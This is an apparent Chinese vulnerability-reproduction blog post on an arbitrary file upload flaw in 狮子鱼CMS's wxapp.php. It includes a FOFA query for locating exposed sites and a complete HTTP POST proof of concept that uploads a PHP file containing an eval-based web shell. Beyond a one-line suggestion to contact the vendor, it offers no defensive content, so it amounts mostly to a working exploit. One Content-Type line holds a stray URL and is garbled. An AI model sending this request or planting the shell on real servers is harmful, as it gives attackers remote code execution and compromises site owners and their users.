【漏洞复现】狮子鱼CMS文件上传漏洞(wxapp.php)
admin 阅读: 2024-03-17
后台-插件-广告管理-内容页头部广告(手机) |
Nx01 产品简介
狮子鱼CMS(Content Management System)是一种网站管理系统,它旨在帮助用户更轻松地创建和管理网站。该系统拥有用户友好的界面和丰富的功能,包括页面管理、博客、新闻、产品展示等。通过简单直观的管理界面,网站所有者可以方便地进行内容的发布、管理和布局。
Nx02 漏洞描述
狮子鱼CMS wxapp.php文件存在任意文件上传漏洞,攻击者可能利用这个漏洞上传恶意文件并执行恶意代码。
Nx03 产品主页
fofa-query: body="/seller.php?s=/Public/login"
Nx04 漏洞复现
POC:
- POST /wxapp.php?controller=Goods.doPageUpload HTTP/1.1
- Host: {{Hostname}}
- Content-Type: multipart/form-data; boundary=----WebKitFormBoundary8UaANmWAgM4BqBSs
- ------WebKitFormBoundary8UaANmWAgM4BqBSs
- Content-Disposition: form-data; name="upfile"; filename="test.php"
- Content-Type: http://peiqi-wiki-poc.oss-cn-beijing.aliyuncs.com/vuln/gif
- <?php @eval($_POST['test']);?>
- ------WebKitFormBoundary8UaANmWAgM4BqBSs--
Nx05 修复建议
建议联系软件厂商进行处理。
声明
1.本站遵循行业规范,任何转载的稿件都会明确标注作者和来源;2.本站的原创文章,请转载时务必注明文章作者和来源,不尊重原创的行为我们将追究责任;3.作者投稿可能会经我们编辑修改或补充。
在线投稿:投稿 站长QQ:1888636
后台-插件-广告管理-内容页尾部广告(手机) |